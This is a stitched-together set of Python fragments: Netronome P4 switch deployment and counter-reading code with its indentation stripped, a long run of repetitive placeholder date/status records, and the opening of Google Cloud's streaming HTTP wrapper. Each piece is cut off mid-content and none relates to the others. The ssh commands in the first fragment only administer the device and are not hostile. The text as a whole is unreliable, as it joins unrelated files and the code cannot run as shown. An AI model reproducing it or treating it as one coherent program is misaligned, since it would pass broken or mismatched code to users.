from stamper_targets.netronome.sdk6_rte import RunTimeEnvironment
from stamper_targets.netronome.sdk6_rte.ttypes import RegisterArrayArg, McastCfgEntry, TableEntry, DesignLoadArgs
TIMESTAMP_FRC = True
class RteError(Exception):
pass
class TargetImpl(AbstractTarget):
def __init__(self, target_cfg):
super().__init__(target_cfg)
self.speed_list = []
def _get_rte_client(self, cfg):
transport = TZlibTransport.TZlibTransport(TTransport.TBufferedTransport(TSocket.TSocket(cfg["p4_dev_ssh"], cfg["thrift_port"])))
rte_client = RunTimeEnvironment.Client(TBinaryProtocol.TBinaryProtocol(transport))
try:
transport.open()
except TTransport.TTransportException:
self.execute_ssh(cfg, "sudo systemctl start nfp-sdk6-rte.service")
time.sleep(1)
transport.open()
return rte_client
# returns a dict["real_ports"] and ["logical_ports"]
def port_lists(self):
real_ports = []
logical_ports = []
# physical ports
for p in range(4):
real_ports.append("p" + str(p))
logical_ports.append(str((p & 0xff) | (0 << 8)))
# host ports
for p in range(64):
real_ports.append("v0." + str(p))
logical_ports.append(str((p & 0xff) | (3 << 8)))
return {"real_ports": real_ports, "logical_ports": logical_ports}
# deploy config file (table entries) to p4 device
def deploy(self, cfg):
try:
print("DEPLOY STARTED AT NETRONOME")
rte_client = self._get_rte_client(cfg)
tables = {t.tbl_name: t for t in rte_client.table_list_all()}
# clear tables of non-default rules
for table in tables.values():
for entry in rte_client.table_retrieve(table.tbl_id):
if not entry.default_rule:
rte_client.table_entry_delete(table.tbl_id, entry)
# clear multicast
for mccfg in rte_client.mcast_config_get_all():
mccfg.ports = []
rte_client.mcast_config_set(mccfg)
# set register r_extHost_max
reg_id = list(filter(lambda r: r.name == "r_extHost_max", rte_client.register_list_all()))[0].id
rte_client.register_field_set(RegisterArrayArg(reg_id=reg_id), 0, str(int(cfg["multicast"]) - 1))
all_ports = []
for loadgen_grp in cfg["loadgen_groups"]:
all_ports.extend([int(host["p4_port"]) for host in loadgen_grp["loadgens"]])
rte_client.mcast_config_set(McastCfgEntry(group_id=0, ports=all_ports))
rte_client.mcast_config_set(McastCfgEntry(group_id=1, ports=all_ports))
# create a mcast group consisting of loadgen_grp and ext host
group = 2
for loadgen_grp in cfg["loadgen_groups"]:
ports = [int(host["p4_port"]) for host in loadgen_grp["loadgens"]]
ports.append(int(cfg["ext_host"]))
loadgen_grp["mcast_grp"] = group
group = group + 1
print("Added ports " + str(ports) + " to mcast grp " + str(loadgen_grp["mcast_grp"]))
rte_client.mcast_config_set(McastCfgEntry(group_id=loadgen_grp["mcast_grp"], ports=ports))
def table_entry_add(table, rule_name, match, action):
print(rule_name + ": " + table + " | match: " + str(match) + " => " + str(action))
match_json = "{{{0}}}".format(",".join(['"{0}":{{"value":"{1}"}}'.format(k, v) for k, v in match.items()]))
action_json = "{{{0}}}".format('"type":"{0}","data":{{{1}}}'.format(action[0], ",".join(['"{0}":{{"value":"{1}"}}'.format(k, v) for k, v in action[1].items()])))
ret = rte_client.table_entry_add(tables[table].tbl_id, TableEntry(
rule_name=rule_name,
match=match_json.encode('ascii'),
actions=action_json.encode('ascii')))
if ret.value != 0:
print("Raise Error in Netronome table_entry_add")
raise RteError(ret.reason)
# loadgenerators -> dut
for loadgen_grp in cfg["loadgen_groups"]:
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"] and dut["use_port"] == "checked":
for host in loadgen_grp["loadgens"]:
table_entry_add("ingress::t_l1_forwarding", "grp{}_loadgen{}_dut{}".format(loadgen_grp["group"], host["id"], dut["id"]),
{"standard_metadata.ingress_port": host["p4_port"]},
["ingress::send", {"spec": dut["p4_port"]}])
# dut -> server/clients (forwarding mode)
# must be executed before t_lx_forwarding
if int(cfg["forwarding_mode"]) >= 2:
table_entry_add("ingress::t_bcast_forwarding", "bcast_mg1",
{"ethernet.dstAddr": "0xffffffffffff"},
["ingress::send", {"spec": "mg1"}])
if cfg["forwarding_mode"] == "1":
for dut in cfg["dut_ports"]:
if dut["use_port"] == "checked":
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["group"] == dut["id"] and len(loadgen_grp["loadgens"]) > 0:
table_entry_add("ingress::t_l1_forwarding", "dut{}_grp{}_host{}".format(dut["id"], loadgen_grp["group"], 0), # host 0 because of L1 forwarding
{"standard_metadata.ingress_port": dut["p4_port"]},
["ingress::send", {"spec": loadgen_grp["loadgens"][0]["p4_port"]}])
break
elif cfg["forwarding_mode"] == "2":
for loadgen_grp in cfg["loadgen_groups"]:
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"] and dut["use_port"] == "checked":
for host in loadgen_grp["loadgens"]:
table_entry_add("ingress::t_l2_forwarding", "dut{}_grp{}_host{}".format(dut["id"], loadgen_grp["group"], host["id"]),
{"standard_metadata.ingress_port": dut["p4_port"],
"ethernet.dstAddr": "0x{}".format(host["loadgen_mac"].replace(":", ""))},
["ingress::send", {"spec": host["p4_port"]}])
elif cfg["forwarding_mode"] == "3":
for loadgen_grp in cfg["loadgen_groups"]:
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"] and dut["use_port"] == "checked":
for host in loadgen_grp["loadgens"]:
table_entry_add("ingress::t_l2_forwarding", "dut{}_grp{}_host{}".format(dut["id"], loadgen_grp["group"], host["id"]),
{"standard_metadata.ingress_port": dut["p4_port"],
"ipv4.dstAddr": host["loadgen_ip"]},
["ingress::send", {"spec": host["p4_port"]}])
# dut -> +external host
if cfg["ext_host"] != "":
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for dut in self.get_all_dut_dst_p4_ports(cfg, get_as_dict=True):
if dut["id"] == loadgen_grp["group"]:
table_entry_add("ingress::t_extHost",
"dut{}_grp_".format(dut["id"], loadgen_grp["group"]),
{"standard_metadata.ingress_port": dut["p4_port"]},
["ingress::send_if_extHost",
{"spec": "mg{}".format(loadgen_grp["mcast_grp"])}])
break
# Change MAC for packages to external host
table_entry_add("egress::t_change_mac", "extHost",
{"standard_metadata.egress_port": cfg["ext_host"]},
["egress::change_mac", {"dstAddr": "ff:ff:ff:ff:ff:ff"}])
# Enable MAC command on physical ports if hardware stamping is activated
EgCmdPrependEn = 0
ports = self.port_lists()
for token, i in zip(ports['real_ports'], ports['logical_ports']):
if token.startswith("p"):
table_entry_add("egress::t_add_empty_nfp_mac_eg_cmd", token,
{"standard_metadata.egress_port": i},
["egress::add_empty_nfp_mac_eg_cmd", {}])
EgCmdPrependEn |= 0xff << (8 * int(i))
sshstr = "sudo /opt/netronome/bin/nfp-reg xpb:Nbi0IsldXpbMap.NbiTopXpbMap.MacGlbAdrMap.MacCsr.EgCmdPrependEn0Lo={0}; sudo /opt/netronome/bin/nfp-reg xpb:Nbi0IsldXpbMap.NbiTopXpbMap.MacGlbAdrMap.MacCsr.EgCmdPrependEn0Hi={1}".format(hex(EgCmdPrependEn & 0xffffffff), hex(EgCmdPrependEn >> 32 & 0xffffffff))
self.execute_ssh(cfg, sshstr)
# Timestamp on dut ports
protos = []
if cfg["stamp_tcp"] == "checked":
protos.append(["tcp", "0x06"])
if cfg["stamp_udp"] == "checked":
protos.append(["udp", "0x11"])
for dut in cfg["dut_ports"]:
if dut["stamp_outgoing"] == "checked" and dut["use_port"] == "checked":
for proto in protos:
table_entry_add("egress::t_timestamp1", "dut{}_{}".format(dut["id"], proto[0]),
{"standard_metadata.egress_port": dut["p4_port"],
"ipv4.protocol": proto[1]},
["egress::timestamp1_{0}_mac".format(proto[0]), {}])
table_entry_add("egress::t_stamped_throughput_egress", "dut{}_{}".format(dut["id"], proto[0]),
{"standard_metadata.egress_port": dut["p4_port"],
"ipv4.protocol": proto[1]},
["egress::c_stamped_throughput_egress_count", {"index": dut["id"] - 1}])
for dut in self.get_all_dut_dst_p4_ports(cfg, get_as_dict=True):
table_entry_add("ingress::t_stamped_throughput_ingress",
"dut{}".format(str(dut["id"])),
{"standard_metadata.ingress_port": dut["p4_port"]},
["ingress::c_stamped_throughput_ingress_count",
{"index": dut["id"] - 1}]) # -1 because IDs start at 1 but index at 0
for proto in protos:
table_entry_add("ingress::t_timestamp2",
"dut{}_{}".format(str(dut["id"]), proto[0]),
{"standard_metadata.ingress_port": dut["p4_port"],
"ipv4.protocol": proto[1]},
["ingress::timestamp2_{0}".format(proto[0]), {}])
i = len(cfg["dut_ports"])
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
for proto in protos:
table_entry_add("egress::t_stamped_throughput_egress",
"host{}_{}_{}".format(host["id"], loadgen_grp["group"], proto[0]),
{"standard_metadata.egress_port": host["p4_port"],
"ipv4.protocol": proto[1]},
["egress::c_stamped_throughput_egress_count", {"index": i}])
i = i + 1
for proto in protos:
table_entry_add("egress::t_stamped_throughput_egress", "ext_host_" + proto[1],
{"standard_metadata.egress_port": cfg["ext_host"],
"ipv4.protocol": proto[1]},
["egress::c_stamped_throughput_egress_count", {"index": i}])
# Measure throughput
for g in ["ingress", "egress"]:
for dut in cfg["dut_ports"]:
table_entry_add("{0}::t_throughput_{0}".format(g), "dut{}".format(dut["id"]),
{"standard_metadata.{0}_port".format(g): dut["p4_port"]},
["{0}::c_throughput_{0}_count".format(g), {"index": dut["id"] - 1}])
i = len(cfg["dut_ports"])
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
table_entry_add("{0}::t_throughput_{0}".format(g), "lg{}".format(i - (len(cfg["dut_ports"]) + 1)),
{"standard_metadata.{0}_port".format(g): host["p4_port"]},
["{0}::c_throughput_{0}_count".format(g), {"index": i}])
i = i + 1
# last index for ext host counter
table_entry_add("{0}::t_throughput_{0}".format(g), "lg{}".format(i - (len(cfg["dut_ports"]) + 1)),
{"standard_metadata.{0}_port".format(g): cfg["ext_host"]},
["{0}::c_throughput_{0}_count".format(g), {"index": i}])
except:
return traceback.format_exc()
print("DEPLOY FINISHED AT NETRONOME")
def read_p4_device(self, cfg):
rte_client = self._get_rte_client(cfg)
try:
registers = {r.name: r for r in rte_client.register_list_all()}
counters = {c.name: c for c in rte_client.p4_counter_list_all()}
except:
registers = {}
counters = {}
def read_reg(reg):
try:
ret = rte_client.register_retrieve(RegisterArrayArg(reg_id=registers[reg].id))
return dict(enumerate([int(val, 16) for val in ret]))
except:
return {}
def read_cnt(cnt):
try:
pck = rte_client.p4_counter_retrieve(counters[cnt + "_packets"].id)
byt = rte_client.p4_counter_retrieve(counters[cnt + "_bytes"].id)
pck_dict = dict(enumerate([i[0] for i in struct.iter_unpack('Q', pck.data)]))
byt_dict = dict(enumerate([i[0] for i in struct.iter_unpack('Q', byt.data)]))
return [pck_dict, byt_dict]
except:
print(traceback.format_exc(()))
return [{}, {}]
cfg["total_deltas"] = read_reg("r_delta_sum").get(0, -1)
cfg["delta_counter"] = read_reg("r_delta_count").get(0, -1)
cfg["min_delta"] = read_reg("r_delta_min").get(0, -1)
cfg["max_delta"] = read_reg("r_delta_max").get(0, -1)
c_throughput_ingress = read_cnt("c_throughput_ingress")
c_throughput_egress = read_cnt("c_throughput_egress")
c_stamped_throughput_ingress = read_cnt("c_stamped_throughput_ingress")
c_stamped_throughput_egress = read_cnt("c_stamped_throughput_egress")
error_val = 0
for dut in cfg["dut_ports"]:
i = dut["id"] - 1
dut["num_ingress_packets"] = c_throughput_ingress[0].get(i, error_val)
dut["num_ingress_bytes"] = c_throughput_ingress[1].get(i, error_val)
dut["num_egress_packets"] = c_throughput_egress[0].get(i, error_val)
dut["num_egress_bytes"] = c_throughput_egress[1].get(i, error_val)
dut["num_ingress_stamped_packets"] = c_stamped_throughput_ingress[0].get(i, error_val)
dut["num_ingress_stamped_bytes"] = c_stamped_throughput_ingress[1].get(i, error_val)
dut["num_egress_stamped_packets"] = c_stamped_throughput_egress[0].get(i, error_val)
dut["num_egress_stamped_bytes"] = c_stamped_throughput_egress[1].get(i, error_val)
i = len(cfg["dut_ports"])
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
host["num_ingress_packets"] = c_throughput_ingress[0].get(i, error_val)
host["num_ingress_bytes"] = c_throughput_ingress[1].get(i, error_val)
host["num_egress_packets"] = c_throughput_egress[0].get(i, error_val)
host["num_egress_bytes"] = c_throughput_egress[1].get(i, error_val)
host["num_ingress_stamped_packets"] = c_stamped_throughput_ingress[0].get(i, error_val)
host["num_ingress_stamped_bytes"] = c_stamped_throughput_ingress[1].get(i, error_val)
host["num_egress_stamped_packets"] = c_stamped_throughput_egress[0].get(i, error_val)
host["num_egress_stamped_bytes"] = c_stamped_throughput_egress[1].get(i, error_val)
i = i + 1
cfg["ext_host_" + "num_ingress_packets"] = 0
cfg["ext_host_" + "num_ingress_bytes"] = 0
cfg["ext_host_" + "num_ingress_stamped_packets"] = 0
cfg["ext_host_" + "num_ingress_stamped_bytes"] = 0
cfg["ext_host_" + "num_egress_packets"] = c_throughput_egress[0].get(i, error_val)
cfg["ext_host_" + "num_egress_bytes"] = c_throughput_egress[1].get(i, error_val)
cfg["ext_host_" + "num_egress_stamped_packets"] = c_stamped_throughput_egress[0].get(i, error_val)
cfg["ext_host_" + "num_egress_stamped_bytes"] = c_stamped_throughput_egress[1].get(i, error_val)
return cfg
def p4_dev_status(self, cfg):
try:
rte_client = self._get_rte_client(cfg)
status = rte_client.design_load_status()
if status.is_loaded:
print("Netronome : device status is: is_loaded==True")
print(status)
uptime = status.uptime
try:
uptime = int(uptime)
if uptime >= 3600:
formatted_uptime = str(int(uptime/3600)) + "h " + str(int((uptime%3600) / 60)) + "min " + str(uptime % 60) + "s"
elif uptime >= 60:
formatted_uptime = str(int(uptime/60)) + "min " + str(uptime%60) + "s"
else:
formatted_uptime = str(uptime) + "s"
except:
formatted_uptime = uptime
dev_status = "{} {} ({}) for {}".format(status.uuid, status.frontend_source, status.frontend_build_date, formatted_uptime)
n = 0
for table in rte_client.table_list_all():
n = n + len(rte_client.table_retrieve(table.tbl_id))
return ["Number of table rules: {}".format(n)], status.is_loaded, dev_status
else:
print("Netronome: device status: is_loaded==False")
print(status)
except:
pass
return [], False, "not running (starting may take a while)"
# starts specific p4 software on device
def start_p4_dev_software(self, cfg):
rte_client = self._get_rte_client(cfg)
nfpfw = open(cfg["nfpfw"], "rb").read()
pif_design_json = open(cfg["pif_design_json"], "rb").read()
| |
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a4', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a5', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a6', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a7', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a8', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', 'status': 'warning'},
{'date': 'day0', 'status': 'ok'},
{'date': 'day11', 'status': 'ok'},
{'date': 'day12', 'status': 'noexec'},
{'date': 'daya1', 'status': 'warning'},
{'date': 'daya2', 'status': 'ok'},
{'date': 'daya3', 'status': 'ok'},
{'date': 'daya4', 'status': 'ok'},
{'date': 'daya5', 'status': 'warning'},
{'date': 'daya6', 'status': 'fail'},
{'date': 'daya7', 'status': 'ok'},
{'date': 'daya8', 'status': 'ok'},
{'date': 'daya9', 'status': 'warning'},
{'date': 'daya0', 'status': 'ok'},
{'date': 'daya11', 'status': 'ok'},
{'date': 'daya12', 'status': 'noexec'},
{'date': 'dayb1', 'status': 'warning'},
{'date': 'dayb2', 'status': 'ok'},
{'date': 'dayb3', 'status': 'ok'},
{'date': 'dayb4', 'status': 'ok'},
{'date': 'dayb5', 'status': 'warning'},
{'date': 'dayb6', 'status': 'fail'},
{'date': 'dayb7', 'status': 'ok'},
{'date': 'dayb8', 'status': 'ok'},
{'date': 'dayb9', 'status': 'warning'},
{'date': 'dayb0', 'status': 'ok'},
{'date': 'dayb11', 'status': 'ok'},
{'date': 'dayb12', 'status': 'noexec'},
{'date': 'dayc1', 'status': 'warning'},
{'date': 'dayc2', 'status': 'ok'},
{'date': 'dayc3', 'status': 'ok'},
{'date': 'dayc4', 'status': 'ok'},
{'date': 'dayc5', 'status': 'warning'},
{'date': 'dayc6', 'status': 'fail'},
{'date': 'dayc7', 'status': 'ok'},
{'date': 'dayc8', 'status': 'ok'},
{'date': 'dayc9', 'status': 'warning'},
{'date': 'dayc0', 'status': 'ok'},
{'date': 'dayc11', 'status': 'ok'},
{'date': 'dayc12', 'status': 'noexec'},
{'date': 'dayd1', 'status': 'warning'},
{'date': 'dayd2', 'status': 'ok'},
{'date': 'dayd3', 'status': 'ok'},
{'date': 'dayd4', 'status': 'ok'},
{'date': 'dayd5', 'status': 'warning'},
{'date': 'dayd6', 'status': 'fail'},
{'date': 'dayd7', 'status': 'ok'},
{'date': 'dayd8', 'status': 'ok'},
{'date': 'dayd9', 'status': 'warning'},
{'date': 'dayd0', 'status': 'ok'},
{'date': 'dayd11', 'status': 'ok'},
{'date': 'dayd12', 'status': 'noexec'}
]},
{'name': 'name-a9', 'data': [
{'date': 'day1', 'status': 'warning'},
{'date': 'day2', 'status': 'ok'},
{'date': 'day3', 'status': 'ok'},
{'date': 'day4', 'status': 'ok'},
{'date': 'day5', 'status': 'warning'},
{'date': 'day6', 'status': 'fail'},
{'date': 'day7', 'status': 'ok'},
{'date': 'day8', 'status': 'ok'},
{'date': 'day9', | |
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""HTTP wrapper for apitools.
This library wraps the underlying http library we use, which is
currently :mod:`httplib2`.
"""
import collections
import contextlib
import logging
import socket
import time
import httplib2
import six
from six.moves import http_client
from six.moves.urllib import parse
from google.cloud.streaming.exceptions import BadStatusCodeError
from google.cloud.streaming.exceptions import RequestError
from google.cloud.streaming.exceptions import RetryAfterError
from google.cloud.streaming.util import calculate_wait_for_retry
_REDIRECTIONS = 5
# 308 and 429 don't have names in httplib.
RESUME_INCOMPLETE = 308
TOO_MANY_REQUESTS = 429
_REDIRECT_STATUS_CODES = (
http_client.MOVED_PERMANENTLY,
http_client.FOUND,
http_client.SEE_OTHER,
http_client.TEMPORARY_REDIRECT,
RESUME_INCOMPLETE,
)
_RETRYABLE_EXCEPTIONS = (
http_client.BadStatusLine,
http_client.IncompleteRead,
http_client.ResponseNotReady,
socket.error,
httplib2.ServerNotFoundError,
ValueError,
RequestError,
BadStatusCodeError,
RetryAfterError,
)
@contextlib.contextmanager
def _httplib2_debug_level(http_request, level, http=None):
"""Temporarily change the value of httplib2.debuglevel, if necessary.
If http_request has a `loggable_body` distinct from `body`, then we
need to prevent httplib2 from logging the full body. This sets
httplib2.debuglevel for the duration of the `with` block; however,
that alone won't change the value of existing HTTP connections. If
an httplib2.Http object is provided, we'll also change the level on
any cached connections attached to it.
:type http_request: :class:`Request`
:param http_request: the request to be logged.
:type level: int
:param level: the debuglevel for logging.
:type http: :class:`httplib2.Http`
:param http:
